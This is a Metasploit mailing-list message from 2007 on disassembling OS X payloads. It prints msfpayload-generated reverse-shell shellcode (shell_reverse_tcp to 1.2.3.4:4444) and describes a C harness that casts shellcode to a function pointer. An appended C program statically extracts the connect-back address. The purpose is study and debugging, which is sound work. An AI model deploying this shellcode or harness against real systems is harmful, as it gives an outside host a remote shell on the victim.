[framework] msfpayload mach-o
H D Moore
hdm at metasploit.com
Fri Aug 17 16:56:14 CDT 2007
On Friday 17 August 2007 16:47, Daniel Guido wrote:
> Are there any plans to write a Rex::Text.to_osxmacho function? :-)

Not yet, any volunteers? ;-)

> If I wanted to disassemble the OSX x86 payloads to see what they're
> doing, how could I write a small program to compile them and load them
> into gdb? (assuming that's the best way to go about it). I'm a little
> stuck.

Try something like:

$ msfpayload osx/x86/payload_name OPT=VAL C

Take this code, put it into a C file that casts the shellcode array to a
function pointer, then calls it (lots of examples in the shellcode
section of milw0rm.com). Then compile and breakpoint like any other app.

Example:

$ msfpayload osx/x86/shell_reverse_tcp LHOST=1.2.3.4 C
/*
* osx/x86/shell_reverse_tcp - 65 bytes
* http://www.metasploit.com
* AppendExit=false, PrependSetresuid=false,
* PrependSetuid=false, LPORT=4444, PrependSetreuid=false,
* LHOST=1.2.3.4
*/
unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";
Example C:
http://milw0rm.com/shellcode/536 PPC
http://milw0rm.com/shellcode/504 X86
-HD
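
Added example, not part of the original message or of Metasploit's code: a static check that reads the connect-back address and port out of the payload bytes quoted above without executing them. It assumes the two leading `push imm32` instructions lay out a BSD sockaddr_in (sin_len, sin_family, sin_port, then the IPv4 address); `struct endpoint` and `find_endpoint` are names made up for this example.

```c
#include <stddef.h>
#include <stdio.h>

/* Bytes copied from the msfpayload output quoted in the message (65 bytes). */
static const unsigned char buf[] =
"\x68\x01\x02\x03\x04\x68\xff\x02\x11\x5c\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";

struct endpoint {            /* hypothetical helper type for this example */
    unsigned char ip[4];
    unsigned port;
};

/*
 * Look for two back-to-back `push imm32` (opcode 0x68) instructions that
 * build a BSD sockaddr_in on the stack: first the IPv4 address, then
 * sin_len, sin_family (AF_INET = 2) and sin_port in network byte order.
 * Returns the offset of the first push, or -1 if the pattern is absent.
 */
static int find_endpoint(const unsigned char *sc, size_t len, struct endpoint *ep)
{
    size_t i;

    for (i = 0; i + 10 <= len; i++) {   /* both pushes need 10 bytes */
        if (sc[i] != 0x68 || sc[i + 5] != 0x68 || sc[i + 7] != 0x02)
            continue;
        ep->ip[0] = sc[i + 1]; ep->ip[1] = sc[i + 2];
        ep->ip[2] = sc[i + 3]; ep->ip[3] = sc[i + 4];
        ep->port = ((unsigned)sc[i + 8] << 8) | sc[i + 9];
        return (int)i;
    }
    return -1;
}

int main(void)
{
    struct endpoint ep;

    if (find_endpoint(buf, sizeof(buf) - 1, &ep) < 0) {
        puts("no sockaddr_in push pattern found");
        return 1;
    }
    printf("connect-back endpoint: %u.%u.%u.%u:%u\n",
           ep.ip[0], ep.ip[1], ep.ip[2], ep.ip[3], ep.port);
    return 0;
}
```

The recovered values match the LHOST=1.2.3.4 and LPORT=4444 options listed in the generated comment header.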